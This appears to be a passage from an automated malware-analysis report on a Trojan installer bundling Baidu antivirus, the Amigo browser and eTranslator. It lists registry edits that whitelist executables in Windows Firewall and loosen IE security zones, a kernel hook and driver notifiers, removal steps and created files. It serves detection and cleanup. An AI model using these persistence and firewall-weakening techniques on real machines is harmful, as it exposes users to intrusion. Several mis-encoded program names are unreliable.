"List" = "System Reserved, Boot Bus Extender, System Bus Extender, SCSI miniport, Port, Primary Disk, SCSI Class, SCSI CDROM Class, FSFilter Infrastructure, FSFilter System, FSFilter Bottom, FSFilter Copy Protection, FSFilter Security Enhancer, FSFilter Open File, FSFilter Physical Quota Management, FSFilter Encryption, FSFilter Compression, FSFilter HSM, FSFilter Cluster File System, FSFilter System Recovery, FSFilter Quota Management, FSFilter Content Screener, FSFilter Continuous Backup, FSFilter Replication, bddriver, FSFilter Anti-Virus, FSFilter Undelete, FSFilter Activity Monitor, FSFilter Top, Filter, Boot File System, Base, Pointer Port, Keyboard Port, Pointer Class, Keyboard Class, Video Init, Video, Video Save, File System, Event Log, Streams Drivers, NDIS Wrapper, COM Infrastructure, UIGroup, LocalValidation, PlugPlay, PNP_TDI, NDIS, TDI, NetBIOSGroup, ShellSvcGroup, SchedulerGroup, SpoolerGroup, AudioGroup, SmartCardGroup, NetworkProvider, RemoteValidation, NetDDEGroup, Parallel arbitrator, Extended Base, PCI Configuration, MS Transactions"
[HKLM\SOFTWARE\MozillaPlugins\@baidu.com/BaidusdDetectNPPlugin]
"Version" = "1.0.0.1"
[HKLM\System\CurrentControlSet\Services\bd0001]
"Group" = "bddriver"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Baidu\BaiduSd]
"VirusTime" = "2013.11.28 0110"
[HKLM\System\CurrentControlSet\Services\bd0001]
"DisplayName" = "bd0001"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\bd0002]
"InstallDir_hips" = "%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\bd0001]
"ErrorControl" = "0"
[]
"DisplayName" = "百度æÂ€毒2.1"
[HKLM\SOFTWARE\Baidu\BaiduSd]
"SupplyID" = "30768"
[HKLM\System\CurrentControlSet\Services\bd0001]
"Description" = "bd0001"
[HKLM\System\CurrentControlSet\Services\BDArKit]
"ErrorControl" = "0"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduSd\2.1.0.3086]
"BaiduSdTray.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdTray.exe:*:Enabled:百度æÂ€毒托盘程åºÂÂ"
The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduSd\2.1.0.3086]
"BaiduSdTray.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdTray.exe:*:Enabled:百度æÂ€毒托盘程åºÂÂ"
The following service will be launched automatically at system boot up:
[HKLM\System\CurrentControlSet\Services\BDArKit]
"Start" = "2"
The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduSd\2.1.0.3086]
"BaiduSdBugRpt.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdBugRpt.exe:*:Enabled:百度æÂ€毒BUG上报程åºÂÂ"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduSd\2.1.0.3086]
"BaiduSdUpdate.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdUpdate.exe:*:Enabled:百度æÂ€毒更新程åºÂÂ"
The following driver will be automatically launched by the NT Native code (IoInitSystem method):
[HKLM\System\CurrentControlSet\Services\bd0002]
"Start" = "1"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\Common Files\Baidu\BDDownload\108]
"bddownloader.exe" = "%Program Files%\Common Files\Baidu\BDDownload\108\bddownloader.exe:*:Enabled:百度高速下载器"
The following driver will be automatically launched by the NT Native code (IoInitSystem method):
[HKLM\System\CurrentControlSet\Services\bd0001]
"Start" = "1"
The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduSd\2.1.0.3086]
"BaiduSdUpdate.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdUpdate.exe:*:Enabled:百度æÂ€毒更新程åºÂÂ"
"BaiduSd.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSd.exe:*:Enabled:百度æÂ€毒主程åºÂÂ"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduSd\2.1.0.3086]
"BaiduSdBugRpt.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdBugRpt.exe:*:Enabled:百度æÂ€毒BUG上报程åºÂÂ"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\Common Files\Baidu\BDDownload\108]
"bddownloader.exe" = "%Program Files%\Common Files\Baidu\BDDownload\108\bddownloader.exe:*:Enabled:百度高速下载器"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduSd\2.1.0.3086]
"BaiduSdSvc.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdSvc.exe:*:Enabled:百度æÂ€毒æœÂÂ务程åºÂÂ"
"BaiduSd.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSd.exe:*:Enabled:百度æÂ€毒主程åºÂÂ"
The Trojan adds process executable file it works in to the list of trusted Windows Firewall applications:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Program Files%\baidu\BaiduSd\2.1.0.3086]
"BaiduSdSvc.exe" = "%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdSvc.exe:*:Enabled:百度æÂ€毒æœÂÂ务程åºÂÂ"
The Trojan deletes the following value(s) in system registry:
[HKLM\System\CurrentControlSet\Services\bd0002]
"DeleteFlag"
[HKLM\System\CurrentControlSet\Services\bd0001]
"DeleteFlag"
[HKLM\System\CurrentControlSet\Services\BDArKit]
"DeleteFlag"
[HKLM\SOFTWARE\Baidu\BaiduSd]
"RtpFlag"
Dropped PE files
There are no dropped PE files.
HOSTS file anomalies
No changes have been detected.
Rootkit activity
Using the driver "%System%\DRIVERS\bd0001.sys" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "%System%\DRIVERS\bd0001.sys" the Trojan controls creation and closing of threads by installing the thread notifier.
Using the driver "%System%\DRIVERS\bd0001.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.
The Trojan installs the following kernel-mode hooks:
ZwUnloadKey
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
taskkill.exe:1744
taskkill.exe:332
regsvr32.exe:2516
regsvr32.exe:3188
amigo.exe:1768
MailRuUpdater.exe:2192
MailRuUpdater.exe:2368
BDKVWsc.exe:2572
id1 - 34.exe:504
%original file name%.exe:928
bddownloader.exe:2316
RegSvr32.exe:4092
RegSvr32.exe:2168
RegSvr32.exe:2272
AmigoDistrib.exe:1676
netsh.exe:2480
BaiduSdTray.exe:2996
etranslator_gui_0 (6) (2).exe:1056
setup.tmp:1748
setup.exe:1304
setup.exe:380
MsiExec.exe:3808
MsiExec.exe:3132
F1023_s_30768.exe:3512 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\debug.log (165 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\User Data\1.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\User Data\2.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Mail.Ru\MailRuUpdater.exe (46100 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\setup.exe (490 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{80C47B02-16F0-424C-920F-6B5A889D2A44}\id1 - 34.exe (1679 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Amigo.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{717598EB-33E7-4687-94A0-8D20DCB6D246}\etranslator_gui_0 (6) (2).exe (23407 bytes)
C:\IEXPLORE.bat (256 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{C1E685B2-3E0A-4D74-9161-D1B5BBD4B5FD}\AmigoDistrib.exe (380715 bytes)
%Documents and Settings%\%current user%\Desktop\Amigo.lnk (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Internet Explorer.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\amigo.bat (645 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Amigo.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_23450.tmp\SETUP.EX_ (1697 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_23450.tmp\setup.exe (18208 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_23450.tmp\CHROME.PACKED.7Z (375522 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config (4 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086 (296 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\ActivePerl 5.16.2 Build 1602 (4 bytes)
%System%\wbem\Logs (4 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Games (4 bytes)
%Documents and Settings%\All Users\APPLICATION DATA (4 bytes)
%WinDir%\WinSxS (8 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Administrative Tools (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\index.dat (484 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\white_list.db-journal (512 bytes)
%WinDir%\Microsoft.NET\Framework\v4.0.30319 (576 bytes)
%WinDir%\WinSxS\Manifests (1444 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp (4 bytes)
%WinDir%\Prefetch\NETSH.EXE-085CFFDE.pf (24 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\IsolationDB.db-journal (532 bytes)
%Program Files%\Common Files (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\G1023_s_71023.exe (12137 bytes)
%WinDir%\Fonts (544 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Accessories\Accessibility (4 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Total Commander (4 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\G1023_s_71023[1].exe (13860 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667 (12 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content (8 bytes)
%WinDir%\Prefetch\REGSVR32.EXE-25EEFE2F.pf (64 bytes)
%Documents and Settings%\%current user%\APPLICATION DATA (4 bytes)
%System%\config (8 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\FTSysFixer (4 bytes)
%WinDir%\Temp\Perflib_Perfdata_678.dat (4 bytes)
%System%\drivers (4 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories (4 bytes)
%System%\wbem\Logs\wbemcore.log (384 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\index.dat (4 bytes)
%WinDir%\Installer (96 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (4 bytes)
%WinDir%\Prefetch\BAIDUSDTRAY.EXE-191E616B.pf (65 bytes)
%Documents and Settings%\%current user%\Application Data\eTranslator\bzip.dll (4061 bytes)
%Documents and Settings%\%current user%\Application Data\eTranslator\etranslator_preferences.json (834 bytes)
%Documents and Settings%\%current user%\Application Data\eTranslator\etranslator1.crx (51 bytes)
%Documents and Settings%\%current user%\Application Data\eTranslator\etranslator3.oex (51 bytes)
%Documents and Settings%\%current user%\Application Data\eTranslator\sqlite3.dll (3421 bytes)
%Documents and Settings%\%current user%\Application Data\eTranslator\eTranslator.exe (24284 bytes)
%Documents and Settings%\%current user%\Application Data\eTranslator\SWData (3833 bytes)
%Documents and Settings%\%current user%\Application Data\eTranslator\eTranslator_withoutzoneid.exe (29521 bytes)
%Documents and Settings%\%current user%\Application Data\eTranslator\SWData_T (23407 bytes)
%Documents and Settings%\%current user%\Application Data\eTranslator\etranslator2.xpi (20 bytes)
%Documents and Settings%\%current user%\Application Data\eTranslator\etranslator.log (52818 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dlinstlit.txt (132 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\F1023_s_30768.exe (2142334 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\test[1].txt (132 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\F1023_s_30768[1].exe (2905069 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Program Files%\baidu\is-1T895.tmp (16 bytes)
%Program Files%\baidu\unins000.dat (934 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-I6R3T.tmp\_isetup\_shfoldr.dll (23 bytes)
%Program Files%\baidu\is-BD508.tmp (23593 bytes)
%Program Files%\baidu\is-E3PTU.tmp (7 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\baidu\baidu.lnk (479 bytes)
%Program Files%\baidu\BindEx.ini (65 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\ok.exe (140 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\fi.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\ms.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\ko.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\nl.pak (226 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\npchrome_frame.dll (15801 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\pt-BR.pak (226 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\hi.pak (1754 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\hr.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\32.0.1709.113\Installer\setup.exe (7971 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\bg.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\hu.pak (246 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\ml.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\sk.pak (241 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\VisualElements\logo.png (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\ml.pak (3679 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\th.pak (1745 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\ÞôýþúûðÑÂÂÑÂÂýøúø.lnk (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Ã’úþýтðúтõ.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\te.pak (1805 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\am.pak (323 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\te.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\pt-PT.pak (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\sr.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\ppgooglenaclpluginchrome.dll (1745 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\vi.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\gu.pak (1745 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\ar.pak (314 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Ã’úþýтðúтõ.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\extensions\mailru_checker_1.2.3.crx (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\amigo.exe (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\ja.pak (282 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\agentloader.exe (115 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\MailRu\MailRuUpdater.exe (46100 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\id.pak (209 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\es-419.pak (237 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\fa.pak (1611 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\chrome_launcher.exe (178 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\pt-BR.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\ca.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\vk.exe (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\it.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\fil.pak (239 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\sw.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\pl.pak (229 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\ko.pak (239 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\icudt.dll (72365 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\resources.pak (172310 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\ru.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\chrome_installer.log (972 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\am.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\libglesv2.dll (6347 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\nb.pak (213 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\ar.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\sl.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\ta.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\lv.dll (8 bytes)
%Documents and Settings%\%current user%\Desktop\Ã’úþýтðúтõ.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\da.pak (213 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\et.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\mailruupdater.exe (45823 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\bn.pak (1769 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\he.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\zh-CN.pak (192 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\fr.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\en-US.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\pt-PT.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\he.pak (266 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\kn.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\es.pak (242 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\es.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\xinput1_3.dll (81 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\chrome.dll (283704 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\mr.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\ffmpegsumo.dll (9606 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\it.pak (229 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\pl.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\vk.exe (165 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\hi.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Application\ok.exe (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\ro.pak (242 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\chrome_child.dll (286042 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\nl.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\fa.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\kn.pak (1815 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\delegate_execute.exe (9606 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\hr.pak (222 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\ja.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\VisualElements\smalllogo.png (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\ta.pak (1829 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\extensions\external_extensions.json (103 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\Locales\ru.pak (1642 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Amigo\Temp\source1304_16837\Chrome-bin\32.0.1709.113\chrome_frame_helper.dll (55 bytes)
